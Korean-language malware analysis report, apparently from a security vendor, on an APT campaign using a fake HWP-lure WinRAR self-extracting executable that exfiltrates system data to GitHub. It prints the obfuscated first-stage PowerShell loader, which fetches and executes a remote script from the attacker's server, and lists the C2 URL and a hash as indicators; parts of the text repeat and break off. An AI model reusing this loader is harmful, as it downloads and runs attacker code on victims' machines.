WinRAR 실행압축 파일과 Github 레파지토리를 이용한 APT 공격
Contents
개요
시큐아이 위협분석그룹은 최근 "한국군사학논집 심사평서.zip" 파일을 통한 국내 공격 사례를 포착했다. 이 ZIP 파일 안에는 HWP 파일로 위장한 실행 파일(EXE)이 포함되어 있으며 해당 파일을 실행하면, 미끼 문서가 표시되고 파워쉘 스크립트가 동작하여 시스템 정보를 탈취한 후 이를 GitHub의 특정 계정으로 전송한다.
악성코드 분석
Stage 1. WinRAR 취약점을 이용한 악성코드 유포
유포된 압축 파일 내에는 정상 파일인 "사례비 지급신청서.hwp" 와 WinRAR 실행압축파일 형태로 된 악성 EXE 파일"한국심사학논집 심사평서(jams2.0).exe 파일이 포함되어 있다.
EXE 파일을 실행할 경우 파일 내에 압축되어 있는 정상적인 한글 문서 파일인 "한국군사학논집 심사평서(jams2.0).hwp"을 실행하게 되는데, 이 과정에서 ShellExecuteExW API가 호출 되고 삽입된 PowerShell 스크립트가 동작하게 된다.
Stage 2. 1st PowerShell 코드 실행
EXE 파일에 삽입되어 있는 PowerShell 스크립트는 호스팅 서비스를 이용한 공격자의 서버로부터 추가 공격코드 받아오는 역할을 한다.
- C2 주소 : hxxp://www.sampleblog365.com/ares/hades.txt
while($true){
[string]$iuyiti={
(New-Object Nt.WebClient).Dryreyrdgdfgasring('htyreywetgdfgtp:/yreywetgdfg/sdfyreywetgdfga.livyreywetgdfgeblog3yreywetgdfg65.cyreywetgdfgom/areyreywetgdfgs/hadyreywetgdfges.txyreywetgdfgt')
};
$eeert=$iuyiti.Replace('yreywetgdfg','');
$hfhgdge=$eeert.Replace('ryreyrdgdfgas','ownloadst');
$werew=iex $hfhgdge;
invoke-expression $werew;
start-sleep -s 1800;
}
Stage 3. 2nd PowerShell 코드 실행
서버로부터 추가로 받아오는 공격코드 역시 PowerShell 스크립트이다. 해당 스크립트는 공격 …
시큐아이 위협분석그룹은 최근 "한국군사학논집 심사평서.zip" 파일을 통한 국내 공격 사례를 포착했다. 이 ZIP 파일 안에는 HWP 파일로 위장한 실행 파일(EXE)이 포함되어 있으며 해당 파일을 실행하면, 미끼 문서가 표시되고 파워쉘 스크립트가 동작하여 시스템 정보를 탈취한 후 이를 GitHub의 특정 계정으로 전송한다.
악성코드 분석
Stage 1. WinRAR 취약점을 이용한 악성코드 유포
유포된 압축 파일 내에는 정상 파일인 "사례비 지급신청서.hwp" 와 WinRAR 실행압축파일 형태로 된 악성 EXE 파일"한국심사학논집 심사평서(jams2.0).exe 파일이 포함되어 있다.
EXE 파일을 실행할 경우 파일 내에 압축되어 있는 정상적인 한글 문서 파일인 "한국군사학논집 심사평서(jams2.0).hwp"을 실행하게 되는데, 이 과정에서 ShellExecuteExW API가 호출 되고 삽입된 PowerShell 스크립트가 동작하게 된다.
Stage 2. 1st PowerShell 코드 실행
EXE 파일에 삽입되어 있는 PowerShell 스크립트는 호스팅 서비스를 이용한 공격자의 서버로부터 추가 공격코드 받아오는 역할을 한다.
- C2 주소 : hxxp://www.sampleblog365.com/ares/hades.txt
while($true){
[string]$iuyiti={
(New-Object Nt.WebClient).Dryreyrdgdfgasring('htyreywetgdfgtp:/yreywetgdfg/sdfyreywetgdfga.livyreywetgdfgeblog3yreywetgdfg65.cyreywetgdfgom/areyreywetgdfgs/hadyreywetgdfges.txyreywetgdfgt')
};
$eeert=$iuyiti.Replace('yreywetgdfg','');
$hfhgdge=$eeert.Replace('ryreyrdgdfgas','ownloadst');
$werew=iex $hfhgdge;
invoke-expression $werew;
start-sleep -s 1800;
}
Stage 3. 2nd PowerShell 코드 실행
서버로부터 추가로 받아오는 공격코드 역시 PowerShell 스크립트이다. 해당 스크립트는 공격 …
IoC
8c0b84910816a5d223f53080961bd8b3e5c56d049a87905cd0d50e10cd88722b
http://www.sampleblog365.com/ares/hades.txt
http://www.sampleblog365.com/ares/hades.txt